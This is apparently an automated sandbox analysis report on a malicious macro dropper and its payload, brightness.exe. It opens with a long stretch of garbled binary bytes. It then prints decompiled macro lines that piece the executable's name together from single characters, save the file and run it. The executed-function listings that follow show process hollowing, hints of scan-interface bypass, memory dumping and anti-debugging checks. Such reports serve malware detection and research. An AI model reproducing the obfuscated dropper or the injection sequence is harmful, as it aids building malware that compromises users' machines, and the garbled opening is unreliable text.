????????????????F???????F??F??????????\x00???????????????????F??-?????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????F?\x13??????????\x00h?????????????\x13????\x02\x00??F?\x13??F??F???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????F????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??F????????\xfffd???????????????F???@????????????????????????????????\|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????F????????????????????F?????????\x00??h\x10?\x00\x01j????F??F???@??????????????F???F???????????\x00?????F????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01? ??????\x00? ??????????F?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????F?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????F?F??F?F\xfffd\x04??F???????????????????@??h???F????h?????????7\x00?????????\x01\x00????????\xfffd\x04??F????????? executed
59	Dim monu1
60	monu1 = "brightness"
61	Dim monu2
62	monu2 = "."
64	Dim monu3
65	monu3 = "e"
67	Dim monu4
68	monu4 = "x"
70	Dim monu5
71	monu5 = "e"
73	Dim monu6
74	monu6 = monu1 & monu2 & monu3 & monu4 & monu5
77	. savetofile monu6, 2
80	Dim parveen1
81	Dim parveen2
82	Dim parveen3
83	Dim parveen4
84	Dim praveen1
85	praveen1 = """brightness"
86	Dim praveen2
87	praveen2 = "."
89	Dim praveen3
90	praveen3 = "e"
92	Dim praveen4
93	praveen4 = "x"
95	Dim praveen5
96	praveen5 = "e"""
101	Dim praveen6
102	praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
106	End With
108	Shell (praveen6)	Shell(""brightness.exe"") -> 8092 executed
110	End Sub

Reset < >

Analysis Process: brightness.exePID: 8092, Parent PID: 7688COMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30%
Total number of Nodes:	1643
Total number of Limit Nodes:	22

Executed Functions

Function 02908C28 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0290889C: LoadLibraryA.KERNEL32(00000000,00000000,02908983), ref: 029088D0
Part of subcall function 0290889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908983), ref: 029088E0
Part of subcall function 0290889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029088F9
Part of subcall function 0290889C: FreeLibrary.KERNEL32(74AE0000,00000000,0294B388,Function_0000662C,00000004,0294B398,0294B388,000186A3,00000040,0294B39C,74AE0000,00000000,00000000,00000000,00000000,02908983), ref: 02908963

Part of subcall function 02908654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029086E0

GetThreadContext.KERNEL32(000008D8,0294B420,ScanString,0294B3A4,0290A7F4,UacInitialize,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,UacInitialize,0294B3A4), ref: 029094BA

Part of subcall function 029082CC: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0290833D

Part of subcall function 0290853C: NtUnmapViewOfSection.NTDLL(?,?), ref: 029085A1

Part of subcall function 02907A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F

Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC

SetThreadContext.KERNEL32(000008D8,0294B420,ScanBuffer,0294B3A4,0290A7F4,ScanString,0294B3A4,0290A7F4,Initialize,0294B3A4,0290A7F4,000008D4,00330FF8,0294B4F8,00000004,0294B4FC), ref: 0290A1CF
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008D8,00000000,000008D8,0294B420,ScanBuffer,0294B3A4,0290A7F4,ScanString,0294B3A4,0290A7F4,Initialize,0294B3A4,0290A7F4,000008D4,00330FF8,0294B4F8), ref: 0290A1DC

Part of subcall function 02908818: LoadLibraryW.KERNEL32(bcrypt,?,000008D8,00000000,0294B3A4,0290A43F,ScanString,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,Initialize,0294B3A4,0290A7F4,UacScan), ref: 0290882C
Part of subcall function 02908818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02908846
Part of subcall function 02908818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008D8,00000000,0294B3A4,0290A43F,ScanString,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,Initialize), ref: 02908882

Strings

Initialize, xrefs: 02908FA2, 029095B0, 02909737, 02909B20, 02909D82, 02909EF2, 0290A065, 0290A2CA, 0290A5FB
UacScan, xrefs: 02908D2B, 02908F43, 0290953F, 0290993B, 02909AAF, 0290A259, 0290A6F1
MiniDumpWriteDump, xrefs: 0290A5CC
sppc, xrefs: 0290922E
UacInitialize, xrefs: 02908EEA, 0290924B, 029093CA, 029094CE, 029098CA, 02909A3E, 0290A1E8
BCryptVerifySignature, xrefs: 0290A42B
BCryptRegisterProvider, xrefs: 0290A453
SLGetLicenseInformation, xrefs: 02909217
NtOpenProcess, xrefs: 0290A75B
NtOpenObjectAuditAlarm, xrefs: 0290A4EC, 0290A5A4
MiniDumpReadDumpStream, xrefs: 0290A5E0
NtReadVirtualMemory, xrefs: 0290A4D8
NtSetSecurityObject, xrefs: 0290A747
ScanString, xrefs: 02908CBA, 02908E65, 02909013, 0290943B, 02909621, 029097A8, 02909C35, 02909DF3, 02909F63, 0290A0D6, 0290A3C1, 0290A46E
BCryptQueryProviderRegistration, xrefs: 0290A43F
I_QueryTagInformation, xrefs: 0290A5B8
dbgcore, xrefs: 0290A5D1, 0290A5E5
ntdll, xrefs: 0290A4DD, 0290A4F1, 0290A5A9, 0290A74C, 0290A760
ScanBuffer, xrefs: 02908D84, 02908E0C, 029091A7, 029092BC, 02909359, 02909692, 02909819, 029099AC, 02909B91, 02909CA6, 02909E64, 02909FD4, 0290A147, 0290A33B, 0290A559, 0290A69F
bcrypt, xrefs: 0290A430, 0290A444, 0290A458
advapi32, xrefs: 0290A5BD
OpenSession, xrefs: 02908C61, 02909084, 02909136, 0290A507, 0290A64D

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 4083799063-51457883
Opcode ID: 551dcf258d86b1f5555fa8dc0346930e6b7a3e3a76bff21e7257ce579791fab1
Instruction ID: bd1d4a3d9a383ecdf7e85263a96f358be8a9723016842c0733f0500f1b26221d
Opcode Fuzzy Hash: 551dcf258d86b1f5555fa8dc0346930e6b7a3e3a76bff21e7257ce579791fab1
Instruction Fuzzy Hash: 13E2F13DB0421D9FDB51EB68D8D0ACF73BAAF85300F5081A29705DB254DA34EE858F96

Function 02908C26 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0290889C: LoadLibraryA.KERNEL32(00000000,00000000,02908983), ref: 029088D0
Part of subcall function 0290889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908983), ref: 029088E0
Part of subcall function 0290889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029088F9
Part of subcall function 0290889C: FreeLibrary.KERNEL32(74AE0000,00000000,0294B388,Function_0000662C,00000004,0294B398,0294B388,000186A3,00000040,0294B39C,74AE0000,00000000,00000000,00000000,00000000,02908983), ref: 02908963

Part of subcall function 02908654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029086E0

GetThreadContext.KERNEL32(000008D8,0294B420,ScanString,0294B3A4,0290A7F4,UacInitialize,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,UacInitialize,0294B3A4), ref: 029094BA

Part of subcall function 029082CC: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0290833D

Part of subcall function 0290853C: NtUnmapViewOfSection.NTDLL(?,?), ref: 029085A1

Part of subcall function 02907A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F

Strings

Initialize, xrefs: 02908FA2, 029095B0, 02909737, 02909B20, 02909D82, 02909EF2, 0290A065, 0290A2CA, 0290A5FB
UacScan, xrefs: 02908D2B, 02908F43, 0290953F, 0290993B, 02909AAF, 0290A259, 0290A6F1
MiniDumpWriteDump, xrefs: 0290A5CC
sppc, xrefs: 0290922E
UacInitialize, xrefs: 02908EEA, 0290924B, 029093CA, 029094CE, 0290A1E8
BCryptVerifySignature, xrefs: 0290A42B
BCryptRegisterProvider, xrefs: 0290A453
SLGetLicenseInformation, xrefs: 02909217
NtOpenProcess, xrefs: 0290A75B
NtOpenObjectAuditAlarm, xrefs: 0290A4EC, 0290A5A4
MiniDumpReadDumpStream, xrefs: 0290A5E0
NtReadVirtualMemory, xrefs: 0290A4D8
NtSetSecurityObject, xrefs: 0290A747
ScanString, xrefs: 02908CBA, 02908E65, 02909013, 0290943B, 02909621, 029097A8, 02909C35, 02909DF3, 02909F63, 0290A0D6, 0290A3C1, 0290A46E
BCryptQueryProviderRegistration, xrefs: 0290A43F
I_QueryTagInformation, xrefs: 0290A5B8
dbgcore, xrefs: 0290A5D1, 0290A5E5
ntdll, xrefs: 0290A4DD, 0290A4F1, 0290A5A9, 0290A74C, 0290A760
ScanBuffer, xrefs: 02908D84, 02908E0C, 029091A7, 029092BC, 02909359, 02909692, 02909819, 029099AC, 02909B91, 02909CA6, 02909E64, 02909FD4, 0290A147, 0290A33B, 0290A559, 0290A69F
bcrypt, xrefs: 0290A430, 0290A444, 0290A458
advapi32, xrefs: 0290A5BD
OpenSession, xrefs: 02908C61, 02909084, 02909136, 0290A507, 0290A64D

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2852987580-51457883
Opcode ID: cb680cc191b540f3b9fa65fe0b391f062af2890415586adef3c24677adfefeb7
Instruction ID: 67569d49dbcce7d03fa1bfa276f2e3162e3c1c3f6e406b03dedd8c10e72d4a1b
Opcode Fuzzy Hash: cb680cc191b540f3b9fa65fe0b391f062af2890415586adef3c24677adfefeb7
Instruction Fuzzy Hash: 92E2E13DB0421D9FDB51EB68D8D0ACF73BAAF85300F5081A29705DB254DA34EE858F96

Function 028F5ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,028F0000,0291E790), ref: 028F5AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B06
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B24
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028F5B42
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028F5B8B
RegQueryValueExA.ADVAPI32(?,028F5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001), ref: 028F5BA9
RegCloseKey.ADVAPI32(?,028F5BD8,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028F5BCB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028F5BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028F5BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028F5BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028F5C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028F5CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028F5CEB

Strings

Software\Borland\Locales, xrefs: 028F5AFC, 028F5B1A
Software\Borland\Delphi\Locales, xrefs: 028F5B38

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: a6c78ca6f48611395a507d999f400ea91cb8a2521ed7642ead4d3760b49cd47c
Instruction ID: 6af000a09ffe07b36c0fcf3e91767cae33e707c6a7b55c9c501a897eb4791729
Opcode Fuzzy Hash: a6c78ca6f48611395a507d999f400ea91cb8a2521ed7642ead4d3760b49cd47c
Instruction Fuzzy Hash: 7951887DA4025CBEFB61D7E8CC46FEF77AD9B04744F8001A1AB09E6181D7789A448FA1

Function 02908818 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,000008D8,00000000,0294B3A4,0290A43F,ScanString,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,Initialize,0294B3A4,0290A7F4,UacScan), ref: 0290882C
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02908846
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008D8,00000000,0294B3A4,0290A43F,ScanString,0294B3A4,0290A7F4,ScanBuffer,0294B3A4,0290A7F4,Initialize), ref: 02908882

Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC

Strings

bcrypt, xrefs: 0290882B
BCryptVerifySignature, xrefs: 0290883F

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 078cd73a3aad28d3d850eb54c40bcd099b56b371747e562f3a3dfc59ef24977e
Instruction ID: 3a063f987e4e6d0b5b70bb74ea6ded16a85ddab1dd4c72e852d92ab0e0456ea0
Opcode Fuzzy Hash: 078cd73a3aad28d3d850eb54c40bcd099b56b371747e562f3a3dfc59ef24977e
Instruction Fuzzy Hash: EEF0A479E862189EE710A77EA894F3637DCA79475CF000A29B51C87180E774D850CB14

Function 0290FA38 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 0290FA48
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0290FA5A
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0290FA71

Strings

KernelBase, xrefs: 0290FA43
CheckRemoteDebuggerPresent, xrefs: 0290FA54

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: cda88f8623e5d0358d717babb719c046ece1d188a5f8034acb40a332142f4e15
Instruction ID: 8c321acdf10ab90f53f2a3d3ef53c41749e23780cdf3283a648c6e51cfbc20a6
Opcode Fuzzy Hash: cda88f8623e5d0358d717babb719c046ece1d188a5f8034acb40a332142f4e15
Instruction Fuzzy Hash: FDF08C7090425CAEDB20A6F98CC8BACBBAD9B05328F6403D0A435A25E1FBB51784C695

Function 0290E064 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 028F4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290E134), ref: 0290E09F
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0290E134), ref: 0290E0CF
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0290E0E4
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0290E110
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0290E119

Part of subcall function 028F4C60: SysFreeString.OLEAUT32(0290F798), ref: 028F4C6E

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: bf9ec89fc9ac726058ac28c3eecb1068d1648da09cf1f83a1d70dfb5b49e901d
Instruction ID: 7f7706b8c528c748537b1ba74d70d5db20b7de90742db25c508c3106978e57fb
Opcode Fuzzy Hash: bf9ec89fc9ac726058ac28c3eecb1068d1648da09cf1f83a1d70dfb5b49e901d
Instruction Fuzzy Hash: C821BE75B5020CBEEB51EAE4CC86FDF77ADEB48700F500562B700F75C0DA74AA058A65

Function 0290E7AC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0290E8EA

Strings

ScanBuffer, xrefs: 0290E833
Initialize, xrefs: 0290E7DA
OpenSession, xrefs: 0290E88C

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: a7a1031397ae3a663ea792cd2c663e52f324e565e27f59da22b16d6eb76fe6fb
Instruction ID: 7064ffa795cc1998695ba9a8c227abef7eac5c484234ca0624cc967843050da8
Opcode Fuzzy Hash: a7a1031397ae3a663ea792cd2c663e52f324e565e27f59da22b16d6eb76fe6fb
Instruction Fuzzy Hash: BC41033DF1010D9FEB40EBA8D880A9FB3FAEF88700F504866E651E7291DA75AD018F51

Function 0290DF80 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 028F4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290E052), ref: 0290DFBF
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DFF9
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290E026
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290E02F

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: aaae4a828ecaff8934985c822528106e001073ed5fc22a5ee4da522b620cd516
Instruction ID: a54c2f86a06800b6baf9aa21ad00f3e25910e1ca11ad5606a3ca6b642fa34376
Opcode Fuzzy Hash: aaae4a828ecaff8934985c822528106e001073ed5fc22a5ee4da522b620cd516
Instruction Fuzzy Hash: B521EC76B4020CBEEB50EAA4DD82F9EB7BDEB44B00F514462B704F71D0D7B4AA048A65

Function 02908654 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02908098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908108,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 029080D6
Part of subcall function 02908098: GetModuleHandleA.KERNELBASE(?), ref: 029080EA

